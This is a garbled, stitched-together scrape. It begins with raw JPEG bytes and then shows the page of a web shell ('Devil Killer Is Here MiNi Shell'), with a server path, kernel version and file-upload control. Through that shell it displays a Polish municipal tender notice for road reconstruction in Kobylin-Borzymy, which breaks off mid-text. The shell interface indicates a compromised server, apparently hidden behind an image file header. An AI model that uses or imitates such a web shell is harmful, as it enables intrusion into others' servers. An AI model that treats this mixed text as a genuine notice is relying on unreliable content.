JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220404/0010812001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa i przebudowa dróg na terenie gminy Kobylin-Borzymy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOBYLIN-BORZYMY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450670195</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobylin-Borzymy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862743003</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862743026</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@kobylinborzymy.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kobylinborzymy.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa i przebudowa dróg na terenie gminy Kobylin-Borzymy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e1ade18-b3ea-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00108120</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023060/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa i przebudowa dróg na terenie gminy Kobylin-Borzymy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kobylinborzymy.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy zakupowej pod adresem https://kobylinborzymy.ezamawiajacy.pl/ oraz pomocniczo<br/>przy użyciu poczty elektronicznej pod adresem e-mail: wojciech.piszczatowski@kobylinborzymy.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu musi zalogować się na Platformie na subdomenie https://kobylinborzymy.ezamawiajacy.pl/ lub<br/>https://oneplace.marketplanet.pl. Wykonawca składa ofertę przy użyciu formularzy umieszczonych w zakładce „Dokumenty<br/>zamówienia”. Składanie ofert polega na załączeniu podpisanych oświadczeń i dokumentów, o których mowa w punkcie 12 SWZ,<br/>oraz na przekazaniu ich Zamawiającemu za pośrednictwem Platformy poprzez dodanie ich w zakładce „OFERTY&#34;. Czynności te<br/>realizowane są poprzez wybranie polecenia „Dodaj dokument&#34; i wybranie docelowego pliku, który ma zostać wczytany (Wykonawca<br/>winien opisać załączniki nazwą umożliwiającą ich identyfikację). Złożenie oferty wraz z załącznikami następuje poprzez polecenie<br/>„Złóż ofertę&#34;. Potwierdzeniem prawidłowo złożonej oferty jest komunikat systemowy „Oferta została złożona” oraz wygenerowany<br/>raport ofert z zakładki „Oferty”. W postępowaniu o udzielenie zamówienia składanie przez Wykonawców pytań, wniosków lub<br/>zawiadomień odbywa się elektronicznie za pośrednictwem Platformy przez opcję „Zadaj pytanie” lub przy użyciu zakładki<br/>„Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika klawisz ZADAJ PYTANIE. Powoduje to otwarcie<br/>okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, a po wypełnieniu wskazanych pól wraz z<br/>wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie wysłania<br/>pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Wszystkie trzy możliwości są równorzędne. Oferta<br/>składana w formie elektronicznej musi zostać podpisana kwalifikowanym podpisem elektronicznym, natomiast oferta składana w<br/>postaci elektronicznej musi zostać podpisana podpisem zaufanym lub podpisem osobistym. Sposób sporządzenia dokumentów<br/>elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).Formaty plików<br/>wykorzystywanych przez wykonawców powinny być zgodne z obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w<br/>sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na<br/>.pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip albo .7Z. Jeśli<br/>Wykonawca pakuje dokumenty np. w plik ZIP, Zamawiający zaleca wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem w formacie PAdES. Pliki<br/>w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XadES – Wykonawca powinien wówczas pamiętać, aby plik<br/>z podpisem przekazywać łącznie z dokumentem podpisywanym. Maksymalny rozmiar plików przesyłanych na Platformę przez<br/>Wykonawcę wynosi 100 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), zwanym dalej rozporządzeniem RODO, w<br/>celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich<br/>wniesienie.<br/>2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia RODO, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Gmina Kobylin-Borzymy, ul. Główna<br/>11, 18-204 Kobylin-Borzymy, tel. 86 274 30 03, e-mail: gmina@kobylinborzymy.eu;<br/>b) inspektorem ochrony danych osobowych jest Piotr Czubaty, e-mail: inspektor@ochronadanych.hub.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego na:<br/><br/>„Rozbudowa i przebudowa dróg na terenie gminy Kobylin-Borzymy”<br/>w skład którego wchodzi:<br/>zakres A:<br/>Rozbudowa i przebudowa ciągu drogowego obejmującego drogę gminną nr 106220B Odcinek „A” od skrzyżowania z drogą krajową<br/>nr 8 w miejscowości Kobylin-Kruszewo w km 0+000 do skrzyżowania z drogą powiatową w km 3+237,67 w m. Kobylin-Kuleszki oraz<br/>Przebudowa drogi gminnej od km 0+000,00 do km 1+409,60 w m. Sikory-Bartkowięta.<br/>zakres B:<br/>Przebudowa drogi gminnej dz. nr ewid. 30/2 od km 0+000,00 do km 0+387,80 w m. Sikory-Wojciechowięta, znak sprawy:<br/>ZP.271.4.2022, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji na podstawie art. 275 pkt 1 ustawy Pzp;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Pzp;<br/>e) Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 rozporządzenia RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 rozporządzenia RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 rozporządzenia RODO prawo do sprostowania Pani/Pana danych osobowych – skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp;<br/>− na podstawie art. 18 rozporządzenia RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia RODO – prawo do ograniczenia przetwarzania nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania, o którym mowa w<br/>lit. c;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia RODO;<br/>− na podstawie art. 21 rozporządzenia RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c rozporządzenia RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rozbudowa i przebudowa ciągu drogowego obejmującego drogę gminną nr 106220B Odcinek „A” od skrzyżowania z drogą<br/>krajową nr 8 w miejscowości Kobylin-Kruszewo w km 0+000 do skrzyżowania z drogą powiatową w km 3+237,67 w m.<br/>Kobylin-Kuleszki oraz Przebudowa drogi gminnej od km 0+000,00 do km 1+409,60 w m. Sikory-Bartkowięta.<br/>W zakresie A: Przedsięwzięcie obejmuje odcinek drogi gminnej nr 106220B od skrzyżowania z drogą krajową nr 8 w<br/>miejscowości Kobylin-Kruszewo w km 0+000 do skrzyżowania z drogą powiatową nr 2043B w km 3+237,67 w m. Kobylin-<br/>Kuleszki o łącznej długości 3,237 km.<br/>Planowana inwestycja polegać będzie na wykonaniu następujących podstawowych robót drogowych:<br/><br/>• przebudowie istniejącej nawierzchni bitumicznej,<br/>• przebudowie nawierzchni poboczy gruntowych na żwirowe i umocnione prefabrykatem<br/>• betonowym,<br/>• przebudowie i budowie zjazdów gospodarczych,<br/>• budowie i przebudowie rowów odwadniających i przepustów<br/>• uzupełnienie oznakowania i urządzeń bezpieczeństwa ruchu.<br/>Założenia projektowe<br/>• droga gminna,<br/>• klasa techniczna drogi (L),<br/>• prędkość projektowa 40 km/h,<br/>• ruch KR1,<br/>• szerokość korony drogi 7,0 m, 7,5 m<br/>• szerokość jezdni 5,0 m,<br/>• rodzaj nawierzchni jezdni – bitumiczna<br/>• pobocza szerokości po 1,0 m,<br/>• rodzaj nawierzchni poboczy – żwirowe, (w części umocnione płytami prefabrykowanymi)<br/>• spadek poprzeczny jezdni daszkowy 2%, na łukach jednostronny,<br/>• spadki poboczy jednostronne 6%,<br/>• sposób odwodnienia – powierzchniowy (rowy przydrożne, przepusty)<br/>• nachylenie skarp 1:1,5 i 1:1 przy umocnieniu<br/>• długość odcinka – 3,237 km<br/>oraz<br/>Przebudowa drogi gminnej od km 0+000,00 do km 1+409,60 w m. Sikory-Bartkowięta.<br/>Planowana inwestycja polegać będzie na wykonaniu następujących podstawowych robót drogowych:<br/>• przebudowie drogi gminnej od km 0+000,00 do km 1+409,60,<br/>• przebudowie skrzyżowania w km 1+165,50,<br/>• przebudowie zjazdów do działek prywatnych wraz z przepustami,<br/>• budowie przepustów pod drogą gminną,<br/>• wycince drzew i krzewów.<br/>• Budowie kanału technologicznego.<br/>Założenia projektowe:<br/>• droga gminna<br/>• klasa techniczna drogi: D,<br/>• prędkość projektowa: 30 km/h,<br/>• kategoria ruchu: KR1,<br/>• zasadnicza szerokość jezdni: 5,00 m,<br/>• szerokość pobocza – 1,00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą w każdym z zakresów Zamawiający uzna ofertę zawierającą najkorzystniejszy<br/>bilans punktów w następujących kryteriach:<br/>1) „Cena” (C) waga 60%<br/>2) „Okres gwarancji” (G) waga 40%<br/>2. Sposób oceny<br/>- wzór do obliczenia punktowego kryterium CENA<br/>Cena najniższa oferowana (brutto)<br/>Cena = ---------------------------------------------------- x 100 punktów x 60%<br/>Cena badanej oferty (brutto)<br/>- określenie OKRESU GWARANCJI w miesiącach:<br/>60 miesięcy gwarancji – 0 pkt,<br/>66 miesięcy gwarancji – 20 pkt,<br/>72 miesiące gwarancji – 40 pkt,<br/>3. Całkowita liczba punktów (K), jaką otrzyma dana oferta, zostanie obliczona będzie wg wzoru: K = C + G<br/>4. Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i<br/>innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej<br/>samej cenie Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego<br/>ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres oferowanej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej dz. nr ewid. 30/2 od km 0+000,00 do km 0+387,80 w m. Sikory-Wojciechowięta<br/>Przebudowa drogi gminnej dz. nr ewid. 30/2 od km 0+000,00 do km 0+387,80 w m. Sikory-Wojciechowięta.<br/>Planowana inwestycja polegać będzie na wykonaniu następujących podstawowych robót drogowych:<br/>• przebudowie drogi gminnej od km 0+000,00 do km 0+387,80,<br/>• przebudowie zjazdów.<br/>• Uwaga: Nie realizuje się zakresu budowy kanału technologicznego.<br/>Założenia projektowe:<br/>• klasa techniczna drogi: D,<br/>• prędkość projektowa: 30 km/h,<br/>• kategoria ruchu: KR1,<br/>• zasadnicza szerokość jezdni: 3,5 m, z poszerzeniem na łuku poziomym do 5,0 m,<br/>• szerokość pobocza – 1,00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą w każdym z zakresów Zamawiający uzna ofertę zawierającą najkorzystniejszy<br/>bilans punktów w następujących kryteriach:<br/>1) „Cena” (C) waga 60%<br/>2) „Okres gwarancji” (G) waga 40%<br/>2. Sposób oceny<br/>- wzór do obliczenia punktowego 